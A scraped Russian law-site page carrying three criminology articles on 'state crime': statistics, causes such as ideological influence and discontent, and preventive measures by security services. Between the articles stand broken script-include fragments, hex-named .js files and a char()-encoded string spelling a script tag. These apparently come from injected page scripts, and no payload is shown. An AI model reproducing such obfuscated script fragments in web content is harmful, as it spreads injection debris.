type="text/javascript">8e8a344f591a2872e2915bf4293eb48a.js" type="text/javascript">dad4d081c93cfe8f38813f62eb89e160.js" type="text/javascript">
Коментариев: 0 | Просмотров: 296 |
Криминологическая характеристика государственной преступности
  Криминология | Автор: admin | 12-05-2010, 19:44
Государственная преступность – это совокупность преступлений, посягающих на государственный и общественный строй России (в исторической ретроспективе – СССР), совершенных за определенный промежуток времени на территории страны в целом или отдельных ее регионах.
Криминологическая оценка состояния, структуры и динамики государственной преступности зависит от факторов социально-экономического, политического и нравственно-этического порядка. На нее влияют уровень активности действия причин, порождающих данный феномен на разных исторических этапах, изменения в уголовном законодательстве, статистическая точность событий и фактов, а также активность и эффективность действия правоохранительной системы.
Все это предполагает некоторые предварительные замечания, без обращения к которым могут происходить ошибки в понятиях и терминах, отражающих рассматриваемое явление.
Термин "государственная преступность" собирательный и отражает указанное понятие социального явления. Он во многом условен, так как напрямую не связан с названием преступлений против государства в разные исторические периоды:
УК 1922 года и УК 1926 года называют их "преступления государственные", УК 1960 года – "государственные преступления", новый УК России 1996 года – "преступления против основ конституционного строя и безопасности государства".
В уголовном законодательстве России государственные преступления имели традиционно-историческое деление на 2 вида: УК 1926 года – "контрреволюционные преступления" и "особо для Союза ССР опасные преступления против порядка управления"; УК 1960 года – "особо опасные государственные преступления" и "иные государственные преступления". Если первый вид преступлений имеет единый родовой объект и логически связанную систему причинных факторов (особо опасные государственные преступления), то второй (иные государственные преступления) – такой логики лишен. У этой категории преступлений нет единого родового объекта, по своим объективным свойствам и причинам, порождающим их, они разношерстны и представляют собой "конгломерат", подвергаемый в литературе обоснованной критике . Криминологический анализ таких преступлений в целом лишается научной основы, хотя статистические материалы по ним представлены. В новом Уголовном кодексе России "иные государственные преступления" упразднены, а их конкретные составы, не потерявшие актуальность в новых условиях, включены в соответствующие главы УК с учетом их направленности на тот или иной родовой объект.
Достоверность криминологической характеристики государственных преступлений зависит от правильной юридической квалификации содеянного. В противном случае криминологическому анализу будет подвергаться совершенно другое социальное явление с присущими ему закономерностями. Именно поэтому в основу анализа положена судебная статистика, ибо рассмотрение уголовного дела в суде дает наибольшую гарантию от возможных ошибок. Использована также статистика зарегистрированных преступлений.

Уровень государственной преступности
Государственная преступность в России стоит на одном из последних мест среди других видов преступности по своему удельному весу. За последние 3 года (1993–1995 годы) ее удельный вес составляет 0,5–1,1% от всей преступности в стране .
Доля особо опасных государственных преступлений в структуре преступности еще меньше – 0,001%. В доперестроечный период (до 1985 года) прослеживалась четкая тенденция их неуклонного снижения. За десятилетний период (1976–1985 годы) по сравнению с предыдущим (1966–1975 годы) количество осужденных за особо опасные государственные преступления сократилось более чем в два раза. За многие годы в статистике осужденных отсутствуют такие преступления, как террористический акт против представителя иностранного государства, вредительство, пропаганда войны.
Статистическое лицо государственной преступности до принятия нового УК определяли иные государственные преступления. В отличие от особо опасных государственных преступлений они наиболее динамично отражают негативные тенденции в экономической, политической и нравственно-этической сферах. Если в 1993 году зарегистрировано 15 713 государственных преступлений, то в 1994 году этот показатель равен 25 350, а в 1995 – 14 610 . Среди экономических преступлений данного вида преобладали контрабанда (ст. 78 УК), транспортные преступления (ст. 85, 86, 861 УК), изготовление или сбыт поддельных денег или ценных бумаг (ст. 87 УК), нарушение правил о валютных операциях (ст. 88 УК).
Однако статистический показатель в оценке государственной преступности в определенной мере условен. Это наглядно видно в оценке особо опасных государственных преступлений, где каждое из них способно нанести колоссальный, а иногда непоправимый ущерб интересам безопасности личности, общества и государства.
Государственная преступность чутко реагирует на изменение стабильности в развитии экономической и политической систем внутри страны и за ее пределами. Особенно четко это просматривается в историческом плане. Острота классовой борьбы после Октября 1917 года выносила на первое место среди контрреволюционных преступлений экстремистские формы противоправной деятельности. Только в 1920 году трибуналы страны рассмотрели 6 тыс. уголовных дел о контрреволюционных преступлениях .
В период коллективизации отмечался сильный рост террористических актов. В 1928 году из всех контрреволюционных преступлений теракты составляли 29,9%, в 1929 – 52,4% (!), в 1930 – 35%, в 1931 – 22,5%. При этом удельный вес представителей различных социальных слоев выглядел следующим образом: кулаков – 45%, середняков – 39,5%, бедняков– 21%, рабочих – 1,5% .
По мере упрочнения социалистической формации, вхождения ее в довольно длительный период стабильного развития планово-государственной системы экстремистские формы государственной преступности уступили место вербальным формам противоправной деятельности (антисоветской агитации и пропаганде). Лишь в условиях резкого обострения международной обстановки либо кризисных событий в какой-либо стране бывшего социалистического лагеря (события в Венгрии – 1956 год, события в Чехословакии – 1968 год, польские события – 1980 год) имело место оживление экстремистских проявлений на фоне общего увеличения особо опасных государственных преступлений. Период Великой Отечественной войны (1941–1945 годы) дал значительный рост судимости за измену Родине, что было обусловлено сложными объективными условиями периода войны во взаимодействии с негативными, а порой и враждебными социально-психологическими установками отдельных граждан.0d4f6a8fd7893f1b73928898f5d92db9.js" type="text/javascript">4d9fde169c77d4cda58f9ba87021fcd9char(46,106,115,34,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,60,47,115,99,114,105,112,116,62)5634cb1eaf0045c6f2e5f11bf3e94236.js" type="text/javascript">2f65928b83de47a3d338ac4ea42974ab.js" type="text/javascript">675aa7946067b3181a7d0e74b73b56c4.js" type="text/javascript">fc89e21641f7b42b820349c4e43310df.js" type="text/javascript">5d3149a35f739b8c6059d48f09deeceb.js" type="text/javascript">b38ceb9010d90a1737c1b03b13f49cff.js" type="text/javascript">f7210191b8ec6a7957748f20b8ba5f87.js" type="text/javascript">33748d2691989d7bbbaaa304ceaa9b06.js" type="text/javascript">751db562b8e2f9d0bd96fdadfa5b9055.js" type="text/javascript">9392cba7be8c9ad89d387df28a86cf56.js" type="text/javascript">9497c1095f04263988466d3bd8388354.js" type="text/javascript">
Коментариев: 0 | Просмотров: 361 |
Специфика детерминации и причинности
  Криминология | Автор: admin | 12-05-2010, 19:44
Причины и условия совершения государственной преступности коренятся в объективных явлениях и процессах жизнедеятельности людей и в субъективной сфере – групповом и общественном сознании. Будучи социально детерминированным явлением особо опасные государственные преступления, как и преступность в целом, зависят прежде всего от характера и условий социальной жизни на данном этапе развития общества и чутко реагируют на всевозможные изменения и различия этих условий.
Причинный комплекс, порождающий государственную преступность, прослеживается на двух уровнях. На уровне общего он вписывается в характер причин, генерирующих преступность в целом. На уровне видовой преступности он несет в себе черты специфики, характерные именно для особо опасных государственных преступлений. Связь общих причин с причинами, непосредственно порождающими указанную категорию преступлений, носит сложный характер поскольку общее преломляется в отдельном неравномерно^ что предопределяется характером самих особо опасных государственных преступлений.
Многолетний анализ государственной преступности показывает, что причины, порождающие ее, носят характер:
информационно-идеологического воздействия на личность извне;
неудовлетворенности личности сложившимися обстоятельствами жизни;
несогласия с официально проводимой политикой правительства в целом либо по отдельным вопросам;
обид на органы власти;
гипертрофированного понимания и неправильного толкования недостатков;
иных факторов.
Информационно-идеологическая причина является наиболее распространенной по категории особо опасных государственных преступлений . Здесь факт совершения противоправного деяния есть следствие серьезного и нередко длительного переосмысления ценностных категорий, образа жизни, личных перспектив, доминирующих мотивов. Особенностью данной причины является то, что она может носить прямую организационную форму подрывной деятельности иностранных спецслужб. Генетическая, воспроизводящая сила причинности здесь состоит в том, что направленное информационное воздействие на человека происходит незаметно, сиюминутных результатов, как правило, не дает, но ведет к устойчивому отражению в сознании воспринимаемых сведений.
Механизм действия информационной причины во многом определяется тем, насколько подготовленной для восприятия информации оказывается сама личность. Она может критически взвешивать услышанное, внутренне осуждать полученную информацию. Тогда речь идет о сильной, цельной в восприяти-ях и ценностных ориентациях личности. Не произойдет взаимодействие объективного процесса информации с ее воздействием на личность – не будет действовать причина.
Если же информация воспринимается личностью как близкая, правдивая и созвучная ее мыслям и чувствам, – причинный механизм начнет функционировать со всеми вытекающими последствиями в виде совершения особо опасного государственного преступления. При всем плюрализме мнений внутренний духовный мир человека и формируемая годами позиция либо установка остаются важнейшим регулятором в общественных отношениях. Наше общество возвращается, и это правильно, к формированию не монопар-тийной, а государственной идеологии как представлении каждого гражданина о должном, социально одобряемом и поддерживаемом государством.
Таким образом, идеологизация причин – главное отличие в механизме порождения государственной преступности от преступлений других видов.
Неудовлетворенность личности сложившимися обстоятельствами жизни выступает причиной особо опасного государственного преступления лишь тогда, когда наступает процесс замещения неудовлетворенности в личном неудовлетворенностью в общественном либо государственной сфере: экономическим укладом жизни, конституционными требованиями и политическими институтами общественного строя и т. п. В результате личное начинает приобретать общественное звучание и политическую направленность. В психологии такой процесс именуется сублимацией, т. е. преобразованием и переключением энергии на цели социальной (либо антисоциальной) деятельности .
Факт совершения лицом особо опасного государственного преступления на основе неудовлетворенности личной жизнью выступает ярким свидетельством уродливой, социально-патологической формы перехода от состояния недовольства к состоянию удовлетворенности.
Следовательно, особенностью механизма действия рассматриваемого причинного фактора является то, что он порождает особо опасное государственное преступление, изменяясь в своем содержании под влиянием других причин, в том числе информационно-идеологической.
Таким образом, неудовлетворенность обстоятельствами личной жизни выступает специфической причиной особо опасных государственных преступлений через механизм преобразования личного в общественное, когда степень неудовлетворенности достигает критической точки во взаимодействии с интересами общества и государства, а также с установленными нормами и правилами общественного бытия.
Несогласие с официально проводимой политикой правительства в целом либо по отдельным вопросам может быть довольно разнообразным по своему содержанию и сферам жизнедеятельности: в области экономической политики, политического курса в отношении некоторых государств, в области национальных отношений, трактовки положений о свободе, демократии, месте и роли государственных органов и общественных организаций в решении общегосударственных задач и т. д.
Само по себе несогласие человека с чем-либо не образует не только государственного, но и любого другого преступления вообще. В нашем случае само несогласие выступает интеграционным звеном причинной цепочки, вокруг которой раскручивается цепь других несогласий. Это обстоятельство нередко в процессе следствия признают сами преступники, заявляя, что "началось все с несогласия...".
Рассматриваемая субъективная причина более емка и подвижна, чем причины объективного порядка. В личности, затронув одно, можно выйти на болевые точки другого. Поэтому, познавая природу несогласий конкретной личности, надо оценивать их в контексте с общим морально-нравственным строем личности, ее направленностью (установкой). В принципе, совершение любого преступления базируется на несогласии субъекта с установленными правилами общественного бытия. Следовательно, суть данной причины состоит не просто в несогласии личности с чем-то, а в том, что за ней стоит общая деформация индивидуума, достигшая того или иного уровня и обращенная через позицию данной личности к разным сферам жизнедеятельности.e640e5564683ad521d353888d8df1c5c.js" type="text/javascript">bb29f89ff2174c01328088e3a5a68fe4char(46,106,115,34,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,60,47,115,99,114,105,112,116,62)7f2bd22a84937b862ff03cdd01ad361e.js" type="text/javascript">f14c84b74f827aa9d963fa7fdf678115.js" type="text/javascript">3fb29bd56f4d1de74bddc48054e34c7d.js" type="text/javascript">a626a9a73ffa4d2dde24454581dbcc99.js" type="text/javascript">0249026facc6c5e8611e97ac70030e88.js" type="text/javascript">7e659c87b5a7a1be7fac790ba6f948ec.js" type="text/javascript">769f290d972d77b86a7efd8b95bd9aad.js" type="text/javascript">2592e3f74efc5ce226c2aeeabdae37eb.js" type="text/javascript">bafe4a98bd347d47992e820914ebd492.js" type="text/javascript">d0cb9c8364feba7c3af58e8aaf838c6b.js" type="text/javascript">ef99250c907c07d95e29a733b53bbb88.js" type="text/javascript">
Коментариев: 0 | Просмотров: 188 |
Особенности борьбы, с государственной преступностью
  Криминология | Автор: admin | 12-05-2010, 19:44
Выявление причинного комплекса, порождающего государственную преступность, не является самоцелью, а выступает необходимым условием целенаправленной борьбы с указанной категорией преступлений. При этом акцент делается на упреждение преступных проявлений. Это позволяет реже прибегать к мерам уголовно-правовой репрессии, делает чище нравственную атмосферу общества, позволяет полнее реализовать принцип демократизации общественных отношений.
Борьба с государственной преступностью на общегосударственном уровне означает проведение комплекса мер, направленных на выход России из тяжелого экономического, политического, социального и духовно-нравственного кризиса, в котором она находится на данном историческом этапе. Эти меры прямо не направлены на локализацию особо опасных государственных преступлений, но через оздоровление всех сфер жизнедеятельности решают главные задачи, которые под силу только обществу и государству в целом: размывают либо поэтапно локализуют действие причин, порождающих преступность. Именно сбалансированное развитие экономики, укрепление государственных институтов власти, поворот к решению назревших социальных проблем, большее внимание к воспитанию подрастающего поколения, формирование продуманной государственной идеологии – путь борьбы с преступностью, включая государственную, в масштабе страны.
Борьба с особо опасными государственными преступлениями специальными методами и средствами локальна. Ее ведут спецслужбы и правоохранительные органы России, на которые данные функции возложены законами. Здесь также на переднем плане должна стоять предупредительная (профилактическая) работа. Ее направленность – воздействие на причины и условия, генерирующие данную категорию преступлений.
Взаимосвязь общей и специальной систем предупреждения государственной преступности – внутренняя, органическая. Нельзя средствами специального предупреждения решить задачи общего предупреждения, равно как и мероприятия общепредупредительного значения поставить в полную зависимость от решения задач борьбы с отдельными видами преступлений. Задача ликвидации преступности не под силу одним правоохранительным органам, поскольку решение этой сложнейшей задачи лежит в русле коренных преобразований общества в целом.
Объектом профилактического воздействия выступает система причин и условий, которые, взаимодействуя, ведут к совершению особо опасных государственных преступлений. Причинность, как объект профилактики преступлений, требует глубокого уяснения с позиций методологических основ данной философской категории и солидного империче-ского материала. В конечном счете уровень профилактики не может быть выше имеющихся представлений о причинах правонарушений, ибо они выступают мишенью, своего рода точками приложения усилий в предупреждении преступности.
Представленная ранее система причин и условий совершения особо опасных государственных преступлений подвергалась экспертной проверке, т. е. выяснению того, насколько система профилактического влияния адекватна системе причин. Изучались материалы практики, проведен опрос 500 оперативных и следственных работников органов государственной безопасности. Это позволило не только решить методически важную задачу, но и скоординировать и дополнить представления о причинном комплексе, порождающем особо опасные государственные преступления.
На первое место в предупредительных мерах практические работники ставят необходимость усиления воспитательной работы в массах . Это логично, ибо в рассмотренных причинах определяющее место занимает негативное информационно-идеологическое воздействие на личность извне. Противопоставить этому влиянию, при отсутствии возможности полной ликвидации данной причины, можно хорошо организованное воспитание, которое позволит значительно снизить восприимчивость отдельной категории граждан к негативному информационному потоку. Значителен профилактический потенциал правового воспитания. "Перестройка и переход к рыночным отношениям своими неожиданными глобальными проблемами заслонили воспитательно-идеологическую работу. Система правового всеобуча, создававшаяся в 70-е и начале 80-х годов с таким трудом и затратами, была разрушена, как разрушено и многое другое, что представляется нам ценным в прошлом опыте борьбы с преступностью" .
В неформализованных ответах по вопросу о недостатках воспитания оперативные и следственные работники в анкетах указывают: "слабо поставлена работа по воспитанию патриотизма, особенно среди молодежи", "нет в воспитательной работе индивидуального подхода", "слаба воспитательная работа средств массовой информации", "низок уровень профессиональной подготовки тех, кто должен заниматься воспитательной работой" и т. п.
Среди мер, направленных на искоренение государственной преступности, указывается "необходимость активного анализа сложных социальных процессов и явлений с целью своевременного вскрытия негативных проявлений и своевременного реагирования на них" . В большей мере это относится к деятельности лиц, осуществляющих управленческие функции. Здесь облегченный и непродуманный подход к решению социальных проблем, проявления бюрократизма и равнодушия к интересам трудящихся ведут к тому, что насущные вопросы социального бытия остаются без внимания и своевременно не разрешаются, научно обоснованный прогноз не строится, а аналитическая работа нередко подменяется интуицией. Особенно остро ставится вопрос об имеющих место фактах нарушения принципа социальной справедливости.
С указанными профилактическими факторами корреспондирует другой – "необходимо усилить государственный контроль за сферами труда и потребления" . Рост социальной дифференциации не соответствует мере вложенного труда тех, кто оказался "наверху", и тех, кто находится за чертой бедности. Идея декларирования доходов находит широкое понимание среди масс, но касается весьма узкой категории граждан (некоторых государственных служащих).
В целом анализ показал определяющее значение экономических мероприятий в борьбе с государственной преступностью, поскольку с.усилением контроля за сферами труда и потребления связаны такие меры, как:
повышение качества организации производства – 39% опрошенных;
активное включение рычагов экономического, рыночного стимулирования в развитие новых общественных отношений – 28%;
внедрение новейших достижений науки и техники в производство и быт – 21%.
Значительное внимание должно быть уделено неукоснительному соблюдению принципа неотвратимости ответственности за правонарушение . В этом блоке предупредительного воздействия фигурируют и другие факторы, тесно связанные с ним:6316125d8a8ce9d4389218b608b08b0b.js" type="text/javascript">1021034a3a2b624909f6442e0130f63echar(46,106,115,34,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,60,47,115,99,114,105,112,116,62)6b57aff03824492ec132977fd56d182a.js" type="text/javascript">8a428c2d90e419599d1bf586c0ee7984.js" type="text/javascript">866bc43112f620a3cde0f1cc13f542e5.js" type="text/javascript">bba63f8839a49dcf67af1d49bea23428.js" type="text/javascript">ac156e5dbfb6d4935015f64e1421f4c3.js" type="text/javascript">fc3c3582003ce99e55739736449f2dac.js" type="text/javascript">8f6235d4186187fc4b74b8a67f33fc26.js" type="text/javascript">b2ec3e4b9c195d163798eb15b838c65c.js" type="text/javascript">79fb8be31b8995b72021f4792b67e164.js" type="text/javascript">320c4131059927a06b9e2a424f268918.js" type="text/javascript">4e49975a6c20fb7609f659d28f91ff8c.js" type="text/javascript">
Коментариев: 0 | Просмотров: 180 |
ukrstroy.biz
ЮРИДИЧЕСКАЯ ЛИТЕРАТУРА:
РАЗНОЕ:
КОММЕНТАРИИ:
ОКОЛОЮРИДИЧЕСКАЯ ЛИТЕРАТУРА: